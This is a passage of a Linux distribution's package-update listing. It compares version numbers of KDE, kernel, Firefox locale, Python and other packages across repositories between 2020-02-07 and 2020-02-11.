                       kplotting-git5.67.0.r221.gad01e9f-15.68.0.r223.g0c10bf1-1
                            kpty-git5.67.0.r244.gd736995-15.68.0.r246.g502254a-1
                           kross-git5.67.0.r268.g70c15bb-15.68.0.r269.ge17c888-1
                         krunner-git5.67.0.r403.g3d182e3-15.68.0.r406.gfe38be3-1
                        kservice-git5.67.0.r733.g18c5a9e-15.68.0.r736.g7ba125a-1
                     ksshaskpass-git5.18.80.r150.ge191464-15.18.80.r151.gbc5badb-1
                       ksysguard-git5.18.80.r3211.g89637fcb-15.18.80.r3212.g3d27f5d9-1
                     ktexteditor-git5.67.0.r2319.g4bfb136f-15.68.0.r2324.g0ace8fac-1
                    ktextwidgets-git5.67.0.r297.gf9d5408-15.68.0.r299.gc410c5e-1
                 kunitconversion-git5.67.0.r291.gbeaeee4-15.68.0.r293.g73ac267-1
                         kwallet-git5.67.0.r942.ge22bc1b-15.68.0.r944.gdbc8db9-1
                        kwayland-git5.67.0.r976.gf1754ba-15.68.0.r978.g8525b95-1
                  kwidgetsaddons-git5.67.0.r627.g7bb6ee8-15.68.0.r628.gef206bb-1
                            kwin-git5.18.80.r17701.gbdd20f61e-15.18.80.r17713.g78c0095a5-1
                   kwindowsystem-git5.67.0.r493.gde05b09-15.68.0.r494.g9554f44-1
                         kxmlgui-git5.67.0.r598.g5eae4d9-15.68.0.r600.gae9fbd9-1
                   kxmlrpcclient-git5.67.0.r379.g5aa6e5651-15.68.0.r381.g6ad8ef811-1
                        linux-latest                5.4-1                5.4-4
              linux-latest-acpi_call                5.4-1                5.4-4
               linux-latest-bbswitch                5.4-1                5.4-4
            linux-latest-broadcom-wl                5.4-1                5.4-4
                linux-latest-headers                5.4-1                5.4-4
            linux-latest-ndiswrapper                5.4-1                5.4-4
           linux-latest-nvidia-340xx                5.4-1                5.4-4
           linux-latest-nvidia-390xx                5.4-1                5.4-4
           linux-latest-nvidia-418xx                5.4-1                5.4-4
           linux-latest-nvidia-430xx                5.4-1                5.4-4
           linux-latest-nvidia-435xx                5.4-1                5.4-4
           linux-latest-nvidia-440xx                5.4-1                5.4-4
               linux-latest-nvidiabl                5.4-1                5.4-4
                  linux-latest-r8168                5.4-1                5.4-4
              linux-latest-rt3562sta                5.4-1                5.4-4
              linux-latest-rtl8723bu                5.4-1                5.4-4
               linux-latest-tp_smapi                5.4-1                5.4-4
            linux-latest-vhba-module                5.4-1                5.4-4
linux-latest-virtualbox-guest-modules               5.4-1                5.4-4
linux-latest-virtualbox-host-modules                5.4-1                5.4-4
                    linux-latest-zfs                5.4-1                5.4-4
                          linux54-rt         5.4.13_rt7-1         5.4.17_rt9-1
                linux54-rt-acpi_call              1.1.0-4              1.1.0-5
                 linux54-rt-bbswitch                0.8-4                0.8-5
              linux54-rt-broadcom-wl       6.30.223.271-4       6.30.223.271-5
                  linux54-rt-headers         5.4.13_rt7-1         5.4.17_rt9-1
             linux54-rt-nvidia-340xx            340.108-3            340.108-4
             linux54-rt-nvidia-390xx            390.132-4            390.132-5
             linux54-rt-nvidia-418xx            418.113-4            418.113-5
             linux54-rt-nvidia-430xx             430.64-4             430.64-5
             linux54-rt-nvidia-435xx             435.21-3             435.21-4
             linux54-rt-nvidia-440xx             440.59-1             440.59-2
                 linux54-rt-nvidiabl               0.88-4               0.88-5
                    linux54-rt-r8168           8.048.00-1           8.048.00-2
                linux54-rt-rtl8723bu           20200126-1           20200126-2
                 linux54-rt-tp_smapi               0.43-4               0.43-5
              linux54-rt-vhba-module           20200106-1           20200106-2
 linux54-rt-virtualbox-guest-modules              6.1.2-2              6.1.2-3
  linux54-rt-virtualbox-host-modules              6.1.2-2              6.1.2-3
                 modemmanager-qt-git5.67.0.r443.g0234502-15.68.0.r444.g76d92a6-1
               networkmanager-qt-git5.67.0.r1029.g256cae5-15.68.0.r1030.g33e9a2a-1
                          oxygen-git5.18.80.r4359.g120fb3e0-15.18.80.r4360.g1c3884a7-1
                    oxygen-icons-git5.67.0.r212.g6b09ee0-15.68.0.r213.ge5f282d-1
                oxygen-icons-svg-git5.67.0.r212.g6b09ee0-15.68.0.r213.ge5f282d-1
                  plasma-desktop-git5.18.80.r7380.g5bb3ebc94-15.18.80.r7404.gf32f0f0c3-1
                plasma-framework-git5.67.0.r15353.gdccf6c4dd-15.68.0.r15361.g9d27675c3-1
                       plasma-nm-git5.18.80.r2760.gc5fcde97-15.18.80.r2763.g8c3300ad-1
                       plasma-pa-git5.18.80.r794.gbd7c146-15.18.80.r797.gd7ad97b-1
                      plasma-sdk-git5.18.80.r2148.gab316a3-15.18.80.r2152.g6b9aad7-1
                    plasma-vault-git5.18.80.r245.gda1d7ad-15.18.80.r248.g545f5e4-1
          plasma-wayland-session-git5.18.80.r8717.g3880695e6-15.18.80.r8739.g531c647b9-1
                plasma-workspace-git5.18.80.r8717.g3880695e6-15.18.80.r8739.g531c647b9-1
                      powerdevil-git5.18.80.r2251.gf8181035-15.18.80.r2257.g436714ec-1
                          prison-git5.67.0.r234.gee565b6-15.68.0.r236.g9c84a8b-1
                         purpose-git5.67.0.r733.g839fd4d-15.68.0.r736.g495adab-1
              qqc2-desktop-style-git5.67.0.r333.g1626d01-15.68.0.r336.g6995b4a-1
                        sddm-kcm-git5.18.80.r507.g6ea4d48-15.18.80.r511.g83c7fca-1
                           solid-git5.67.0.r538.g113f759-15.68.0.r539.g49b728d-1
                          sonnet-git5.67.0.r510.g266c8f7-15.68.0.r513.g19cd6b1-1
                     syndication-git5.67.0.r751.gdb087e1-15.68.0.r753.g21cc6ff-1
             syntax-highlighting-git5.67.0.r1066.g295a1ed-15.68.0.r1070.g8069aab-1
                  systemsettings-git5.18.80.r2188.g21b4de9c-15.18.80.r2191.ga1d44475-1
                    threadweaver-git5.67.0.r428.g8866145-15.68.0.r429.g02cbff4-1
                           timeshift19.08.1.r43.ge4139e6-119.08.1.r53.g8e51d05-1
                                 tlp            1.2.2-1.1              1.3.1-1
                             tlp-rdw            1.2.2-1.1              1.3.1-1
                    user-manager-git5.18.80.r478.g2739b8d-15.18.80.r479.g80ac93f-1
           gnome-layout-switcher-dev                    -              0.6.6-2
               linux-latest-catalyst                    -                5.4-4
                            minikube                    -              1.7.2-0


:: Different sync package(s) in repository community x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2020-02-07           2020-02-11
-------------------------------------------------------------------------------
                             acme.sh              2.8.4-1              2.8.5-1
                           afl-utils              1.34a-2              1.34a-3
                                alot              0.8.1-2                0.9-1
                                atom             1.43.0-1             1.44.0-1
                            audacity            1:2.3.3-1            1:2.3.3-2
                          babeltrace              1.5.7-1              1.5.8-1
                               bazel              2.0.0-1              2.1.0-1
                               broot             0.13.0-1             0.13.1-1
                             buildah             1.13.2-1             1.14.0-1
                      bzr-fastimport        0.14.0.r361-2                    -
                               cacti              1.2.8-1              1.2.9-1
                             calibre              4.9.1-1             4.10.1-1
                      calibre-common              4.9.1-1             4.10.1-1
                     calibre-python3              4.9.1-1             4.10.1-1
                             caprine             2.43.0-1             2.44.0-1
                              choqok              1.7.0-1              1.7.0-2
                          containerd              1.3.2-1              1.3.3-1
                                crun               0.12-1             0.12.1-1
               elementary-icon-theme              5.1.0-1              5.2.0-1
                           exploitdb           20200117-1           20200208-1
                              faudio              20.01-1              20.02-1
                               faust             2.20.2-2             2.20.2-3
                           findomain              1.3.0-1              1.4.0-1
                                 fio               3.17-1               3.18-1
                            flyspray             1.0rc9-1             1.0rc9-2
                          freeradius             3.0.20-3             3.0.20-4
                              gifski              0.9.1-1             0.10.1-1
                    gimp-plugin-gmic              2.8.3-1              2.8.4-1
                           git-annex         7.20191230-7         7.20200204-1
                                gmic              2.8.3-1              2.8.4-1
                                gost              2.9.2-1             2.10.1-1
                                grpc             1.27.0-2             1.27.1-1
                            grpc-cli             1.27.0-2             1.27.1-1
                          gwenhywfar              5.1.2-1              5.1.3-1
                         hcxdumptool              6.0.0-1              6.0.1-1
                                 hey              0.1.2-2              0.1.3-1
                            homebank              5.3.1-1              5.3.2-1
                                hugo             0.64.0-1             0.64.1-1
                            influxdb              1.7.9-1             1.7.10-1
               intel-compute-runtime        20.04.15428-1        20.05.15524-1
                                 iwd                1.4-1                1.5-1
                                juce              5.4.6-1              5.4.7-1
                                kbfs              5.1.1-1              5.2.0-1
                             keybase              5.1.1-1              5.2.0-1
                         keybase-gui              5.1.1-1              5.2.0-1
                            keycloak              8.0.1-3              8.0.2-1
                                khal             0.10.1-2             0.10.1-3
        kodi-addon-audioencoder-flac            1:2.0.5-1            1:2.0.6-1
        kodi-addon-audioencoder-lame            1:2.0.3-2            1:2.0.4-1
      kodi-addon-audioencoder-vorbis            1:2.0.3-2            1:2.0.4-1
         kodi-addon-audioencoder-wav            1:2.0.2-2            1:2.0.3-1
         kodi-addon-inputstream-rtmp              2.0.8-1              2.0.9-1
                             kpmcore              4.0.1-1              4.1.0-1
                   krita-plugin-gmic              2.8.3-1              2.8.4-1
                                 ksh           2020.0.0-1           2020.0.0-2
                             libindi              1.8.3-1              1.8.4-1
                       libmicrohttpd             0.9.69-1             0.9.70-1
                        libquicktime             1.2.4-21             1.2.4-22
                           libratbag               0.12-1               0.13-1
                 libretro-beetle-psx               2228-1               2240-1
              libretro-beetle-psx-hw               2228-1               2240-1
                   libretro-bsnes-hd                 21-1                 22-1
                    libretro-flycast               4039-1               4065-1
                   libretro-gambatte                819-1                825-1
            libretro-genesis-plus-gx               1559-1               1576-1
                       libretro-mgba               6624-1               6674-1
           libretro-mupen64plus-next              1:192-1              1:194-1
               libretro-parallel-n64               5121-1               5126-1
                     libretro-ppsspp              26442-1              26463-1
              libretro-shaders-slang                701-1                704-1
                       libsemigroups              1.0.5-1              1.0.6-1
                        light-locker              1.8.0-3              1.9.0-1
                            lollypop             1.2.20-1             1.2.21-1
                         lsp-plugins             1.1.13-1             1.1.13-2
                           lttng-ust             2.11.0-2             2.11.0-3
                            luarocks              3.3.0-1              3.3.1-1
                             mathjax              3.0.0-1              3.0.1-1
                          metasploit             5.0.70-1             5.0.73-1
                            minikube              1.6.2-1              1.7.2-1
                      mongo-c-driver             1.16.0-1             1.16.1-1
                           moony.lv2             0.30.0-1             0.30.0-2
                           musescore              3.4.1-1              3.4.2-1
                                ncdu             1.14.1-1             1.14.2-1
                             neomutt           20191207-1           20191207-3
                  nextcloud-app-news             14.1.2-1             14.1.3-1
                 nextcloud-app-notes              3.1.2-1              3.1.4-1
                nextcloud-app-spreed            1:8.0.1-1            1:8.0.3-1
                              nikola              8.0.3-1              8.0.4-1
                                 nim              1.0.4-1              1.0.6-1
                              nodejs             13.7.0-1             13.8.0-1
                         nodejs-less             3.10.3-2             3.11.0-1
                    otf-font-awesome             5.12.0-1             5.12.1-1
                            pageedit              1.1.0-1              1.1.1-1
                         par2cmdline              0.8.0-2              0.8.1-1
                    partitionmanager              4.0.0-1              4.1.0-1
                         pdfarranger              1.4.0-1              1.4.1-1
         perl-alien-base-modulebuild               1.10-1               1.11-1
                    perl-ppix-regexp              0.068-1              0.069-1
          perl-shell-config-generate               0.33-2               0.34-1
                            pgadmin4               4.17-1               4.18-1
                            php-grpc             1.27.0-2             1.27.1-1
                               piper                0.3-2                0.4-1
                           plowshare              2.1.7-3              2.1.7-4
                              podman              1.7.0-1              1.8.0-1
                       podman-docker              1.7.0-1              1.8.0-1
                        postfixadmin              3.2.3-1              3.2.3-2
                           profanity            1:0.7.1-1            1:0.8.1-1
                       profanity-gtk            1:0.7.1-1            1:0.8.1-1
                              puppet             6.12.0-1             6.12.0-2
                           py3status               3.24-1               3.25-1
                    pyopencl-headers         1:2019.1.2-2         1:2019.1.2-3
                      python-alembic              1.3.2-1              1.3.3-1
                  python-argcomplete             1.10.0-3             1.11.1-1
                     python-autobahn             20.1.3-1             20.2.1-1
                     python-cfn-lint             0.27.3-1             0.27.4-1
                   python-diff-cover              2.5.2-2              2.6.0-1
            python-django-extensions              2.2.6-1              2.2.7-1
                        python-gdspy                1.5-2              1.5.1-1
                        python-gmpy2            2.1.0b3-1            2.1.0b4-1
                       python-grpcio             1.27.0-2             1.27.1-1
                       python-hidapi            0.9.0.1-1            0.9.0.2-1
                       python-igraph        0.7.1.post6-6              0.8.0-1
                        python-json5              0.9.0-1              0.9.1-1
                    python-jsonpatch               1.24-3               1.25-1
              python-language-server             0.31.7-1             0.31.8-1
                     python-lttngust             2.11.0-2             2.11.0-3
                         python-mox3             0.28.0-3              1.0.0-1
                      python-mutagen             1.43.0-1             1.44.0-1
             python-nose-progressive              1.5.2-2              1.5.2-3
                      python-osc-lib             1.15.0-1              2.0.0-1
                       python-pandas              1.0.0-1              1.0.1-1
                      python-pikepdf             1.10.0-1             1.10.1-1
                 python-pycryptodome              3.9.4-1              3.9.5-1
                     python-pyopencl         1:2019.1.2-2         1:2019.1.2-3
                 python-pytest-black              0.3.7-3              0.3.8-1
                python-pytest-pylint    0.14.1.20191107-1             0.15.0-1
                        python-quart             0.10.0-3             0.11.1-1
                   python-quart-cors              0.2.0-2              0.3.0-1
                         python-sane              2.8.3-3              2.8.3-4
               python-setuptools-scm              3.3.3-3              3.4.0-1
                       python-sphinx              2.2.1-2              2.4.0-1
                        python-tblib              1.5.0-1              1.6.0-1
                      python-tempora              2.1.0-1              2.1.1-1
                         python-tqdm             4.28.1-4             4.30.0-1
                     python-watchdog             0.10.1-1             0.10.2-1
                     python-werkzeug             0.16.1-1              1.0.0-1
                     python2-alembic              1.3.2-1              1.3.3-1
             python2-distutils-extra               2.39-5                    -
                  python2-fastimport              0.9.8-1                    -
                   python2-jsonpatch               1.24-3               1.25-1
                        python2-mox3             0.28.0-3              1.0.0-1
                     python2-mutagen             1.43.0-1             1.43.0-2
                python2-pycryptodome              3.9.4-1              3.9.5-1
                      python2-pygit2             0.28.2-2                    -
                        python2-sane              2.8.3-3                    -
              python2-setuptools-scm              3.3.3-3              3.4.0-1
                    python2-watchdog             0.10.1-1             0.10.2-1
                    python2-werkzeug             0.16.1-1              1.0.0-1
                                qcad           3.24.2.3-1           3.24.2.4-1
                              raylib              2.5.0-2              2.6.0-1
                              rclone             1.50.2-1             1.51.0-1
                           reprotest             0.7.12-1             0.7.13-1
                        ruby-msgpack              1.3.2-1              1.3.3-1
                                 sbt            1:1.3.7-1            1:1.3.8-1
            shadowsocks-v2ray-plugin              1.2.0-1              1.3.0-1
                      signal-desktop             1.30.1-1             1.31.0-1
                             signify                 27-1                 28-1
                              skopeo             0.1.40-1             0.1.41-1
                            spectrwm              3.2.0-1              3.3.0-1
                              sqlmap                1.4-1              1.4.2-1
                             stunnel               5.56-1               5.56-2
                               tilda              1.4.1-1              1.5.0-1
                    ttf-font-awesome             5.12.0-1             5.12.1-1
                        ttf-ibm-plex              4.0.2-1              4.0.2-2
                        ttf-ionicons              4.6.3-1              5.0.0-1
                  ttf-jetbrains-mono              1.0.2-1              1.0.3-1
                      ttf-liberation             2.00.5-2              2.1.0-1
         v2ray-domain-list-community       202002051516-1       202002100152-1
                      vim-latexsuite           1:1.10.0-2           1:1.10.0-3
                                 vis  0.5.r127.g17b83db-1  0.5.r136.gab3c613-1
                          winetricks           20191224-1           20191224-2
                    yubioath-desktop              5.0.1-2              5.0.2-1
                                zart              2.8.3-1              2.8.4-1
                         babeltrace2                    -              2.0.1-1
                         cgit-aurweb                    -              1.2.2-1
                 haskell-casa-client                    -     0.0.0.20191219-1
                  haskell-casa-types                    -     0.0.0.20191219-1
        python-flake8-typing-imports                    -              1.5.1-1
                       python-thrift                    -             0.13.0-2
                               sfizz                    -              0.2.0-2


:: Different overlay package(s) in repository core x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2020-02-07           2020-02-11
-------------------------------------------------------------------------------
                   amd-ucode 20200206.r1574.5351afe-1 20200207.r1575.6f89735-2
              linux-firmware 20200206.r1574.5351afe-1 20200207.r1575.6f89735-2
                             linux53             5.3.18-1                    -
                     linux53-headers             5.3.18-1                    -
                             linux54             5.4.18-1             5.4.18-2
                     linux54-headers             5.4.18-1             5.4.18-2
                             linux55              5.5.2-1              5.5.2-2
                     linux55-headers              5.5.2-1              5.5.2-2
                             systemd            242.153-3              244.2-2
                        systemd-libs            242.153-3              244.2-2
                  systemd-resolvconf            242.153-3              244.2-2
                  systemd-sysvcompat            242.153-3              244.2-2
                             linux56                 - 5.6rc1.d0209.gbb6d3fb-2
                     linux56-headers                 - 5.6rc1.d0209.gbb6d3fb-2


:: Different sync package(s) in repository core x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2020-02-07           2020-02-11
-------------------------------------------------------------------------------
                            autoconf               2.69-6               2.69-7
             ca-certificates-mozilla             3.49.2-3               3.50-1
                               hwids           20191025-2           20200204-1
                                 nss             3.49.2-3               3.50-1


:: Different overlay package(s) in repository extra x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2020-02-07           2020-02-11
-------------------------------------------------------------------------------
                           boxit-arm              2.1.3-1              2.1.3-2
               calamares-git 3.2.19.r6995.70f370f0d-1 3.2.19.r7070.7333a925b-1
                   linux53-acpi_call             1.1.0-19                    -
                    linux53-bbswitch               0.8-19                    -
                 linux53-broadcom-wl      6.30.223.271-19                    -
                 linux53-ndiswrapper              1.62-19                    -
                linux53-nvidia-340xx            340.108-1                    -
                linux53-nvidia-390xx           390.132-10                    -
                linux53-nvidia-418xx            418.113-9                    -
                linux53-nvidia-430xx             430.64-8                    -
                linux53-nvidia-435xx            435.21-19                    -
                linux53-nvidia-440xx             440.59-1                    -
                    linux53-nvidiabl              0.88-19                    -
                       linux53-r8168           8.047.05-6                    -
                   linux53-rtl8723bu     4.3.9.3.13200-19                    -
                    linux53-tp_smapi              0.43-19                    -
                 linux53-vhba-module          20190831-19                    -
    linux53-virtualbox-guest-modules              6.1.0-4                    -
     linux53-virtualbox-host-modules              6.1.0-4                    -
                         linux53-zfs              0.8.3-1                    -
                    linux56-tp_smapi                    -             0.43-0.1
                 linux56-vhba-module                    -         20200106-0.1


:: Different sync package(s) in repository extra x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2020-02-07           2020-02-11
-------------------------------------------------------------------------------
                        alsa-plugins              1.2.1-1              1.2.1-5
                              attica             5.66.0-1             5.67.0-1
                        avogadrolibs             1.93.0-1             1.93.0-2
                               baloo             5.66.0-1             5.67.0-1
                         bdf-unifont            12.1.03-1            12.1.04-1
                            bluez-qt             5.66.0-1             5.67.0-1
                        breeze-icons             5.66.0-1             5.67.0-1
                              breezy            3.0.2.3-1            3.0.2.3-2
                                 bzr              2.7.0-3                    -
                            cbindgen             0.13.0-1             0.13.1-1
                            chromium       80.0.3987.87-1       80.0.3987.87-2
                              clamav            0.102.1-1            0.102.2-1
                             digikam              6.4.0-6              6.4.0-7
                            enscript              1.6.6-3              1.6.6-4
                 extra-cmake-modules             5.66.0-1             5.67.0-1
                          fakechroot             2.20.1-1             2.20.1-2
                             firefox             72.0.2-1               73.0-1
                    firefox-i18n-ach             72.0.2-1               73.0-1
                     firefox-i18n-af             72.0.2-1               73.0-1
                     firefox-i18n-an             72.0.2-1               73.0-1
                     firefox-i18n-ar             72.0.2-1               73.0-1
                    firefox-i18n-ast             72.0.2-1               73.0-1
                     firefox-i18n-az             72.0.2-1               73.0-1
                     firefox-i18n-be             72.0.2-1               73.0-1
                     firefox-i18n-bg             72.0.2-1               73.0-1
                     firefox-i18n-bn             72.0.2-1               73.0-1
                     firefox-i18n-br             72.0.2-1               73.0-1
                     firefox-i18n-bs             72.0.2-1               73.0-1
                     firefox-i18n-ca             72.0.2-1               73.0-1
            firefox-i18n-ca-valencia             72.0.2-1               73.0-1
                    firefox-i18n-cak             72.0.2-1               73.0-1
                     firefox-i18n-cs             72.0.2-1               73.0-1
                     firefox-i18n-cy             72.0.2-1               73.0-1
                     firefox-i18n-da             72.0.2-1               73.0-1
                     firefox-i18n-de             72.0.2-1               73.0-1
                    firefox-i18n-dsb             72.0.2-1               73.0-1
                     firefox-i18n-el             72.0.2-1               73.0-1
                  firefox-i18n-en-ca             72.0.2-1               73.0-1
                  firefox-i18n-en-gb             72.0.2-1               73.0-1
                  firefox-i18n-en-us             72.0.2-1               73.0-1
                     firefox-i18n-eo             72.0.2-1               73.0-1
                  firefox-i18n-es-ar             72.0.2-1               73.0-1
                  firefox-i18n-es-cl             72.0.2-1               73.0-1
                  firefox-i18n-es-es             72.0.2-1               73.0-1
                  firefox-i18n-es-mx             72.0.2-1               73.0-1
                     firefox-i18n-et             72.0.2-1               73.0-1
                     firefox-i18n-eu             72.0.2-1               73.0-1
                     firefox-i18n-fa             72.0.2-1               73.0-1
                     firefox-i18n-ff             72.0.2-1               73.0-1
                     firefox-i18n-fi             72.0.2-1               73.0-1
                     firefox-i18n-fr             72.0.2-1               73.0-1
                  firefox-i18n-fy-nl             72.0.2-1               73.0-1
                  firefox-i18n-ga-ie             72.0.2-1               73.0-1
                     firefox-i18n-gd             72.0.2-1               73.0-1
                     firefox-i18n-gl             72.0.2-1               73.0-1
                     firefox-i18n-gn             72.0.2-1               73.0-1
                  firefox-i18n-gu-in             72.0.2-1               73.0-1
                     firefox-i18n-he             72.0.2-1               73.0-1
                  firefox-i18n-hi-in             72.0.2-1               73.0-1
                     firefox-i18n-hr             72.0.2-1               73.0-1
                    firefox-i18n-hsb             72.0.2-1               73.0-1
                     firefox-i18n-hu             72.0.2-1               73.0-1
                  firefox-i18n-hy-am             72.0.2-1               73.0-1
                     firefox-i18n-ia             72.0.2-1               73.0-1
                     firefox-i18n-id             72.0.2-1               73.0-1
                     firefox-i18n-is             72.0.2-1               73.0-1
                     firefox-i18n-it             72.0.2-1               73.0-1
                     firefox-i18n-ja             72.0.2-1               73.0-1
                     firefox-i18n-ka             72.0.2-1               73.0-1
                    firefox-i18n-kab             72.0.2-1               73.0-1
                     firefox-i18n-kk             72.0.2-1               73.0-1
                     firefox-i18n-km             72.0.2-1               73.0-1
                     firefox-i18n-kn             72.0.2-1               73.0-1
                     firefox-i18n-ko             72.0.2-1               73.0-1
                    firefox-i18n-lij             72.0.2-1               73.0-1
                     firefox-i18n-lt             72.0.2-1               73.0-1
                     firefox-i18n-lv             72.0.2-1               73.0-1
                     firefox-i18n-mk             72.0.2-1               73.0-1
                     firefox-i18n-mr             72.0.2-1               73.0-1
                     firefox-i18n-ms             72.0.2-1               73.0-1
                     firefox-i18n-my             72.0.2-1               73.0-1
                  firefox-i18n-nb-no             72.0.2-1               73.0-1
                  firefox-i18n-ne-np             72.0.2-1               73.0-1
                     firefox-i18n-nl             72.0.2-1               73.0-1
                  firefox-i18n-nn-no             72.0.2-1               73.0-1
                     firefox-i18n-oc             72.0.2-1               73.0-1
                  firefox-i18n-pa-in             72.0.2-1               73.0-1
                     firefox-i18n-pl             72.0.2-1               73.0-1
                  firefox-i18n-pt-br             72.0.2-1               73.0-1
                  firefox-i18n-pt-pt             72.0.2-1               73.0-1
                     firefox-i18n-rm             72.0.2-1               73.0-1
                     firefox-i18n-ro             72.0.2-1               73.0-1
                     firefox-i18n-ru             72.0.2-1               73.0-1
                     firefox-i18n-si             72.0.2-1               73.0-1
                     firefox-i18n-sk             72.0.2-1               73.0-1
                     firefox-i18n-sl             72.0.2-1               73.0-1
                    firefox-i18n-son             72.0.2-1               73.0-1
                     firefox-i18n-sq             72.0.2-1               73.0-1
                     firefox-i18n-sr             72.0.2-1               73.0-1
                  firefox-i18n-sv-se             72.0.2-1               73.0-1
                     firefox-i18n-ta             72.0.2-1               73.0-1
                     firefox-i18n-te             72.0.2-1               73.0-1
                     firefox-i18n-th             72.0.2-1               73.0-1
                     firefox-i18n-tl             72.0.2-1               73.0-1
                     firefox-i18n-tr             72.0.2-1               73.0-1
                    firefox-i18n-trs             72.0.2-1               73.0-1
                     firefox-i18n-uk             72.0.2-1               73.0-1
                     firefox-i18n-ur             72.0.2-1               73.0-1
                     firefox-i18n-uz             72.0.2-1               73.0-1
                     firefox-i18n-vi             72.0.2-1               73.0-1
                     firefox-i18n-xh             72.0.2-1               73.0-1
                  firefox-i18n-zh-cn             72.0.2-1               73.0-1
                  firefox-i18n-zh-tw             72.0.2-1               73.0-1
                frameworkintegration             5.66.0-1             5.67.0-1
                                  gv              3.7.4-4              3.7.4-5
                         imagemagick           7.0.9.21-1           7.0.9.22-1
                     imagemagick-doc           7.0.9.21-1           7.0.9.22-1
                         kactivities             5.66.0-1             5.67.0-1
                   kactivities-stats             5.66.0-1             5.67.0-1
                             kapidox             5.66.0-1             5.67.0-1
                            karchive             5.66.0-1             5.67.0-1
                               kauth             5.66.0-1             5.67.0-1
                          kbookmarks             5.66.0-1             5.67.0-1
                         kcachegrind            19.12.2-1            19.12.2-2
                  kcachegrind-common            19.12.2-1            19.12.2-2
                       kcalendarcore             5.66.0-1             5.67.0-1
                            kcmutils             5.66.0-1             5.67.0-1
                             kcodecs             5.66.0-1             5.67.0-1
                         kcompletion             5.66.0-1             5.67.0-1
                             kconfig             5.66.0-1             5.67.0-1
                      kconfigwidgets             5.66.0-1             5.67.0-2
                           kcontacts           1:5.66.0-1           1:5.67.0-1
                         kcoreaddons             5.66.0-1             5.67.0-1
                              kcrash             5.66.0-1             5.67.0-1
                         kdbusaddons             5.66.0-1             5.67.0-1
                     kde-dev-scripts            19.12.2-1            19.12.2-2
                        kdeclarative             5.66.0-1             5.67.0-1
                                kded             5.66.0-1             5.67.0-1
                     kdelibs4support             5.66.0-1             5.67.0-2
                     kdesignerplugin             5.66.0-1             5.67.0-1
                               kdesu             5.66.0-1             5.67.0-1
                           kdewebkit             5.66.0-1             5.67.0-1
                              kdnssd             5.66.0-1             5.67.0-1
                           kdoctools             5.66.0-1             5.67.0-1
                          kemoticons             5.66.0-1             5.67.0-1
                       kfilemetadata             5.66.0-1             5.67.0-1
                        kglobalaccel             5.66.0-1             5.67.0-1
                          kguiaddons             5.66.0-1             5.67.0-1
                           kholidays           1:5.66.0-1           1:5.67.0-1
                               khtml             5.66.0-1             5.67.0-1
                               ki18n             5.66.0-1             5.67.0-1
                         kiconthemes             5.66.0-1             5.67.0-1
                           kidletime             5.66.0-1             5.67.0-1
                       kimageformats             5.66.0-1             5.67.0-1
                               kinit             5.66.0-1             5.67.0-1
                                 kio             5.66.0-1             5.67.0-1
                           kirigami2             5.66.0-1             5.67.1-1
                         kitemmodels             5.66.0-1             5.67.0-1
                          kitemviews             5.66.0-1             5.67.0-1
                         kjobwidgets             5.66.0-1             5.67.0-1
                                 kjs             5.66.0-1             5.67.0-1
                            kjsembed             5.66.0-1             5.67.0-1
                        kmediaplayer             5.66.0-1             5.67.0-1
                           knewstuff             5.66.0-1             5.67.0-1
                      knotifications             5.66.0-1             5.67.0-1
                       knotifyconfig             5.66.0-1             5.67.0-1
                            kpackage             5.66.0-1             5.67.0-1
                              kparts             5.66.0-1             5.67.0-1
                             kpeople             5.66.0-1             5.67.0-1
                           kplotting             5.66.0-1             5.67.0-1
                                kpty             5.66.0-1             5.67.0-1
                        kquickcharts             5.66.0-1             5.67.0-1
                               kross             5.66.0-1             5.67.0-1
                             krunner             5.66.0-1             5.67.0-1
                            kservice             5.66.0-1             5.67.0-1
                         ktexteditor             5.66.0-1             5.67.0-1
                        ktextwidgets             5.66.0-1             5.67.0-1
                     kunitconversion             5.66.0-1             5.67.0-1
                             kwallet             5.66.0-2             5.67.0-1
                            kwayland             5.66.0-1             5.67.0-1
                      kwidgetsaddons             5.66.0-1             5.67.0-1
                       kwindowsystem             5.66.0-1             5.67.0-1
                             kxmlgui             5.66.0-1             5.67.0-1
                       kxmlrpcclient             5.66.0-1             5.67.0-1
                              libgee             0.20.2-1             0.20.3-1
                             libkate              0.4.1-6              0.4.1-7
                           libsmbios              2.4.2-2              2.4.3-1
                       libusb-compat              0.1.5-2              0.1.7-1
                          libusbmuxd              2.0.0-2              2.0.1-1
                     modemmanager-qt             5.66.0-1             5.67.0-1
                   networkmanager-qt             5.66.0-1             5.67.0-1
                                 ntp          4.2.8.p13-2          4.2.8.p13-3
                             numactl             2.0.13-1             2.0.13-2
                        oxygen-icons           1:5.66.0-1           1:5.67.0-1
                    oxygen-icons-svg           1:5.66.0-1           1:5.67.0-1
                               pango        1:1.44.7-1 1:1.44.7+11+g73b46b04-1
                    plasma-framework             5.66.0-1             5.67.0-1
                              prison             5.66.0-1             5.67.0-1
                             psutils               1.93-1               1.93-2
                             purpose             5.66.0-1             5.67.0-1
                   python-pyelftools               0.25-3               0.26-1
                         qcachegrind            19.12.2-1            19.12.2-2
                  qqc2-desktop-style             5.66.0-1             5.67.1-1
                              qt5-3d             5.14.1-1             5.14.1-2
                            qt5-base             5.14.1-1             5.14.1-2
             qt5-xcb-private-headers             5.14.1-1             5.14.1-2
                                sane             1.0.28-3             1.0.29-1
                              screen              4.7.0-1              4.8.0-1
                 seahorse-nautilus 3.11.92+57+g390364d-1 3.11.92+66+g02c81f1-1
                               solid             5.66.0-1             5.67.0-1
                              sonnet             5.66.0-1             5.67.0-1
                              strace                5.4-1                5.5-1
                         syndication             5.66.0-1             5.67.0-1
                 syntax-highlighting             5.66.0-1             5.67.0-1
                        threadweaver             5.66.0-1             5.67.0-1
                             tomcat8             8.5.41-1             8.5.50-1
                                vala             0.46.5-1             0.46.6-1
                            visualvm              1.4.3-1              1.4.4-1
                      wpebackend-fdo              1.4.0-2              1.4.1-1
                           xournalpp             1.0.16-1             1.0.17-1
                       genxrdpattern                    -                1.1-1
                                loki                    -              1.3.0-1
                            mmtf-cpp                    -              1.0.0-2


:: Different overlay package(s) in repository multilib x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2020-02-07           2020-02-11
-------------------------------------------------------------------------------
                       lib32-systemd            242.153-2              244.2-1


:: Different sync package(s) in repository multilib x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2020-02-07           2020-02-11
